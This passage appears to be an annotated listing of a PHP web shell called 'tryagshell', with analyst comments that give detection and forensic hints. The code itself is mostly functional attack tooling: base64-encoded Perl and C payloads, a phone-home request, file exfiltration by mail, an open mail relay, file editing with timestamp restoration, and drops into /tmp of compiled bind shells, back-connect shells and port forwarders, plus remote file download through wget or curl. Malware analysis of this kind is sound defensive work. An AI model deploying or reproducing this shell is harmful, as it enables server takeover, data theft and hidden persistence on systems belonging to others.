1643 gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
1644 lsZSk7DQogIHJldHVybiAwOw0KfQ==";
1645 $datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
1646 CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
1647 bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
1648 gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
1649 NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
1650 iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
1651 aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
1652 SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
1653 xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
1654 WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
1655 CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
1656 yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
1657 I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
1658 m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
1659 IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
1660 lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
1661 QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
1662 CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
1663 c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
1664 NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
1665 UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
1666 DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
1667 ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
1668 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
1669 $c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
1670 JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
1671 lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
1672 FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
1673 3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
1674 J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
1675 oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
1676 xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
1677 i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
1678 dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
1679 ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
1680 hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
1681 $c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
1682 IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
1683 hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
1684 tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
1685 XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
1686 8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
1687 ybmV0LS0+";
// Analyst note: prints the page header; $head is assigned outside this part of the listing.
1688 echo $head;
1689 echo '</head>';
// Version check-in ("phone home"). Runs only when no command was posted and the
// first octet of SERVER_ADDR is not 127, 192, 172 or 10. It prints a zero-size
// <img> pointing at version.php and also fetches version.php server-side with
// readfile(), passing the shell version with the dots removed.
// NOTE(review): the host is 127.0.0.1 in this listing; presumably the original
// address was replaced before publication - confirm against another sample.
// Detection: an outbound HTTP fetch by the PHP process and browser requests for
// /tryagshell/version.php. readfile() on a URL only works with allow_url_fopen on.
1690 if(empty($_POST['cmd'])) {
1691 $serv = array(127,192,172,10);
1692 $addr=@explode('.', $_SERVER['SERVER_ADDR']);
1693 $current_version = str_replace('.','',$version);
1694 if (!in_array($addr[0], $serv)) {
1695 @print "<img src=\"http://127.0.0.1/tryagshell/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
1696 @readfile ("http://127.0.0.1/tryagshell/version.php?version=".$current_version."");}}
// Analyst note: banner row. Prints the literal "tryagshell <version>" title, the
// server time, and links that re-request this script with the query strings
// ?phpinfo, ?phpini, ?cpu, ?mem, ?users (unix only), ?tmp and ?delete.
// $_SERVER['PHP_SELF'] is written into the markup without escaping.
// Detection: the banner text and these query strings in access logs are usable
// signature material for this family.
1697 echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
1698 <tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp;
1699 <font face=Webdings size=6><b>!</b></font><b>'.ws(2).'tryagshell '.$version.'</b>
1700 </font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
1701 echo ws(2);
1702 echo "<b>".date ("d-m-Y H:i:s")."</b>";
1703 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
1704 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
1705 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
1706 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
1707 if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; }
1708 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
1709 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
1710 echo ws(2);
// Environment survey shown to the operator: safe_mode state, PHP version, and
// whether the cURL, MySQL, MSSQL, PostgreSQL and Oracle client functions exist.
1711 echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>"));
1712 echo ws(2);
1713 echo "PHP version: <b>".@phpversion()."</b>";
1714 $curl_on = @function_exists('curl_version');
1715 echo ws(2);
1716 echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
1717 echo ws(2);
1718 echo "MySQL: <b>";
1719 $mysql_on = @function_exists('mysql_connect');
1720 if($mysql_on){
1721 echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
1722 echo ws(2);
1723 echo "MSSQL: <b>";
1724 $mssql_on = @function_exists('mssql_connect');
1725 if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
1726 echo ws(2);
1727 echo "PostgreSQL: <b>";
1728 $pg_on = @function_exists('pg_connect');
1729 if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
1730 echo ws(2);
1731 echo "Oracle: <b>";
1732 $ora_on = @function_exists('ocilogon');
1733 if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
1734 echo "<br>".ws(2);
// Shows the disable_functions ini value, i.e. which PHP functions the host has
// blocked. An empty value is reported as NONE.
1735 echo "Disable functions : <b>";
1736 if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
// Free and total disk space for $dir. $used and $used_percent are computed but
// not printed in the lines visible here.
1737 $free = @diskfreespace($dir);
1738 if (!$free) {$free = 0;}
1739 $all = @disk_total_space($dir);
1740 if (!$all) {$all = 0;}
1741 $used = $all-$free;
1742 $used_percent = @round(100/($all/$free),2);
1743 echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>";
// Analyst note: host identification panel, rendered on every page load.
// ex() is defined outside this part of the listing; from its use here it is
// presumably the shell's command runner - confirm against its definition.
// Detection: the web-server account repeatedly spawning `uname -a`, `sysctl -n`,
// `echo $OSTYPE` and `id` is a strong process-lineage indicator.
1744 echo '</font></td></tr><table>
1745 <table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
1746 <tr><td align=right width=100>';
1747 echo $font;
1748 if(!$windows){
1749 echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1750 echo "</td><td>";
1751 echo "<font face=Verdana size=-2 color=red><b>";
// Falls back to php_uname() when the command returns nothing.
1752 $uname = ex('uname -a');
1753 echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
// The sysctl probes (BSD key names, then Linux key names) are skipped under safe_mode.
1754 if(!$safe_mode){
1755 $bsd1 = ex('sysctl -n kern.ostype');
1756 $bsd2 = ex('sysctl -n kern.osrelease');
1757 $lin1 = ex('sysctl -n kernel.ostype');
1758 $lin2 = ex('sysctl -n kernel.osrelease');
1759 }
1760 if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
1761 else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
1762 else { $sysctl = "-"; }
1763 echo ws(3).$sysctl."<br>";
1764 echo ws(3).ex('echo $OSTYPE')."<br>";
1765 echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
// Falls back to PHP's own user/uid/gid functions when `id` returns nothing.
1766 $id = ex('id');
1767 echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
1768 echo ws(3).$dir;
1769 echo ws(3).'( '.perms(@fileperms($dir)).' )';
1770 echo "</b></font>";
1771 }
1772 else
1773 {
// Windows branch: no commands are run here, only php_uname() and get_current_user().
1774 echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
1775 echo "</td><td>";
1776 echo "<font face=Verdana size=-2 color=red><b>";
1777 echo ws(3).@substr(@php_uname(),0,120)."<br>";
1778 echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
1779 echo ws(3).@get_current_user()."<br>";
1780 echo ws(3).$dir;
1781 echo "<br></font>";
1782 }
1783 echo "</font>";
1784 echo "</td></tr></table>";
1785 $f = '<br>';
// Analyst note: cmd=mail sends a message through PHP mail() with recipient,
// subject and body taken directly from the POST request, so the compromised host
// acts as a mail relay for anyone who can reach this page. mr() is defined
// elsewhere and receives the send result.
// Detection: unexpected outbound mail queued by the web-server account.
1786 if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail")
1787  {
1788  $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."\r\n");
1789  mr($language,$res);
1790  $_POST['cmd']="";
1791  }
// Analyst note: cmd=mail_file reads any local file the PHP process can open
// (path from POST loc_file) and mails it as an attachment - a data-exfiltration
// path that needs no inbound connection. compress() and mailattach() are defined
// elsewhere in the file.
// Indicators on this page: default subject 'file from tryagshell' and default
// sender 'billy@microsoft.com' when the operator leaves those fields empty.
1792 if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
1793  {
1794  if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST['cmd']=""; }
1795  else
1796   {
1797     $filename = @basename($_POST['loc_file']);
1798     $filedump = @fread($file,@filesize($_POST['loc_file']));
1799     fclose($file);
1800     $content_encoding=$mime_type='';
1801     compress($filename,$filedump,$_POST['compress']);
1802     $attach = array(
1803                     "name"=>$filename,
1804                     "type"=>$mime_type,
1805                     "content"=>$filedump
1806                    );
1807     if(empty($_POST['subj'])) { $_POST['subj'] = 'file from tryagshell'; }
1808     if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
1809     $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
1810     mr($language,$res);
1811     $_POST['cmd']="";
1812   }
1813  }
// Analyst note: cmd=find_text rewrites the pending command into a
// `find ... | xargs grep -E ...` pipeline assembled from three POST fields. The
// string is not run here; it is handed to ex() in the output stage further down
// when safe_mode is off.
// Detection: find/xargs/grep children of the web-server process.
1814 if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
1815 {
1816 $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
1817 }
// Analyst note: cmd=ch_ changes owner, group or mode of a POST-supplied path
// using PHP's own chown()/chgrp()/chmod(), so no child process appears. The mode
// string is parsed as octal. Errors are suppressed with @ and nothing is reported.
// Detection: file-integrity monitoring on ownership and permission changes under
// the web root.
1818 if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
1819  {
1820  switch($_POST['what'])
1821    {
1822    case 'own':
1823    @chown($_POST['param1'],$_POST['param2']);
1824    break;
1825    case 'grp':
1826    @chgrp($_POST['param1'],$_POST['param2']);
1827    break;
1828    case 'mod':
1829    @chmod($_POST['param1'],intval($_POST['param2'], 8));
1830    break;
1831    }
1832  $_POST['cmd']="";
1833  }
// Analyst note: cmd=mk creates or deletes a file or directory at a POST-supplied
// path using PHP filesystem calls (fopen/unlink/mkdir/rmdir). Creating a file
// switches the pending command to edit_file so the editor opens on the new,
// empty file. ce() is defined elsewhere and is called when creation fails.
1834 if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
1835  {
1836    switch($_POST['what'])
1837    {
1838      case 'file':
1839       if($_POST['action'] == "create")
1840        {
// Refuses to overwrite an existing file; otherwise creates it by opening for write.
1841        if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
1842        else {
1843         fclose($file);
1844         $_POST['e_name'] = $_POST['mk_name'];
1845         $_POST['cmd']="edit_file";
1846         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
1847         }
1848        }
1849        else if($_POST['action'] == "delete")
1850        {
1851        if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
1852        $_POST['cmd']="";
1853        }
1854      break;
1855      case 'dir':
1856       if($_POST['action'] == "create"){
1857       if(mkdir($_POST['mk_name']))
1858        {
1859          $_POST['cmd']="";
1860          echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
1861        }
1862       else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
1863       }
1864       else if($_POST['action'] == "delete"){
1865       if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
1866       $_POST['cmd']="";
1867       }
1868      break;
1869    }
1870  }
// Analyst note: cmd=edit_file shows the contents of a POST-supplied path in a
// textarea and, when the file could be opened "r+", offers a save button that
// posts back with cmd=save_file. The file body is HTML-escaped; the file name and
// $dir are written into the form without escaping or quoting.
// The script exits after rendering the editor.
1871 if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
1872  {
// First open attempt only decides whether the editor is read-only.
1873  if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
1874  if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
1875  else {
1876  echo $table_up3;
1877  echo $font;
1878  echo "<form name=save_file method=post>";
1879  echo ws(3)."<b>".$_POST['e_name']."</b>";
1880  echo "<div align=center><textarea name=e_text cols=121 rows=24>";
1881  echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
1882  fclose($file);
1883  echo "</textarea>";
1884  echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
1885  echo "<input type=hidden name=dir value=".$dir.">";
1886  echo "<input type=hidden name=cmd value=save_file>";
1887  echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
1888  echo "</div>";
1889  echo "</font>";
1890  echo "</form>";
1891  echo "</td></tr></table>";
1892  exit();
1893  }
1894  }
// Analyst note: cmd=save_file overwrites the target with the posted text and then
// restores the file's previous modification and access times with touch()
// (timestamp tampering). After an edit made through this shell, mtime therefore
// does not show when the file changed.
// Forensics: compare content hashes against a known-good baseline and look at the
// inode change time (ctime), which touch() does not set back.
1895 if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
1896  {
// Captured before the write so it can be put back afterwards.
1897  $mtime = @filemtime($_POST['e_name']);
1898  if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
1899  else {
// On unix hosts CRLF from the browser is converted to LF before writing.
1900  if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
1901  @fwrite($file,$_POST['e_text']);
1902  @touch($_POST['e_name'],$mtime,$mtime);
1903  $_POST['cmd']="";
1904  echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
1905  }
1906  }
// Analyst note: the six handlers below drop helper programs into /tmp and start
// them in the background through ex(). ex(), cf() and which() are defined outside
// this part of the listing; from their use here cf() presumably writes the named
// base64 payload variable to the given path - confirm against its definition.
// POST values are concatenated into the command lines without escaping.
// Host artefacts named in this code: /tmp/bd, /tmp/bdpl, /tmp/back, /tmp/backc,
// /tmp/dp, /tmp/dpc. The .c sources are unlinked right after gcc runs; the
// binaries and Perl scripts are left in place.
// Detection: the web-server account spawning gcc or perl, new files in /tmp owned
// by that account, and listening sockets or outbound connections it opens.
// Hardening: noexec on /tmp stops the compiled binaries (not the Perl scripts),
// keep compilers off production web hosts, and restrict egress from web servers.

// Listener, C variant: selected by POST port + bind_pass with use=C.
1907 if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
1908 {
1909  cf("/tmp/bd.c",$port_bind_bd_c);
1910  $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
1911  @unlink("/tmp/bd.c");
1912  $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
// The follow-up command lists matching processes so the result is shown in the output pane.
1913  $_POST['cmd']="ps -aux | grep bd";
1914 }
// Listener, Perl variant: same trigger with use=Perl.
1915 if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
1916 {
1917  cf("/tmp/bdpl",$port_bind_bd_pl);
1918  $p2=which("perl");
1919  if(empty($p2)) $p2="perl";
1920  $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
1921  $_POST['cmd']="ps -aux | grep bdpl";
1922 }
// Outbound connect-back, Perl variant: selected by POST ip + port with use=Perl.
1923 if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
1924 {
1925  cf("/tmp/back",$back_connect);
1926  $p2=which("perl");
1927  if(empty($p2)) $p2="perl";
1928  $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
1929  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
1930 }
// Outbound connect-back, C variant.
1931 if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
1932 {
1933  cf("/tmp/back.c",$back_connect_c);
1934  $blah = ex("gcc -o /tmp/backc /tmp/back.c");
1935  @unlink("/tmp/back.c");
1936  $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
1937  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
1938 }
// Port forwarder ("datapipe"), Perl variant: local_port -> remote_host:remote_port.
1939 if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
1940 {
1941  cf("/tmp/dp",$datapipe_pl);
1942  $p2=which("perl");
1943  if(empty($p2)) $p2="perl";
1944  $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
1945  $_POST['cmd']="ps -aux | grep dp";
1946 }
// Port forwarder, C variant; note the argument order differs from the Perl one.
1947 if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
1948 {
1949  cf("/tmp/dpc.c",$datapipe_c);
1950  $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
1951  @unlink("/tmp/dpc.c");
1952  $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
1953  $_POST['cmd']="ps -aux | grep dpc";
1954 }
// Analyst note: a POST 'alias' value is looked up in $aliases (defined outside
// this part of the listing) and, on a match, replaces the pending command.
1955 if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}
// File upload: copies the uploaded temp file to <POST dir>/<name>, where the name
// is either the client-supplied file name or POST new_name. No type, extension or
// path checks are applied, so this is a second-stage file drop into any directory
// the PHP process can write.
// NOTE(review): reads the legacy $HTTP_POST_FILES array rather than $_FILES;
// presumably this branch never fires on PHP builds without that array - confirm.
// Detection: new files under the web root written by the web-server account.
1956 if (!empty($HTTP_POST_FILES['userfile']['name']))
1957 {
1958 if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
1959 else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
1960 @copy($HTTP_POST_FILES['userfile']['tmp_name'],
1961             $_POST['dir']."/".$nfn)
1962       or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
1963 }
// Analyst note: remote-to-local download. Depending on POST 'with', the pending
// command becomes a wget, fetch, lynx, links, GET or curl invocation that saves
// POST rem_file to POST loc_file. Nothing runs here; the string is executed by
// ex() in the output stage when safe_mode is off. Both values are concatenated
// into the command line without escaping.
// Detection: the web-server account spawning any of these download tools, and
// outbound HTTP/FTP from a host that normally only serves requests.
1964 if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
1965 {
1966  switch($_POST['with'])
1967  {
1968  case wget:
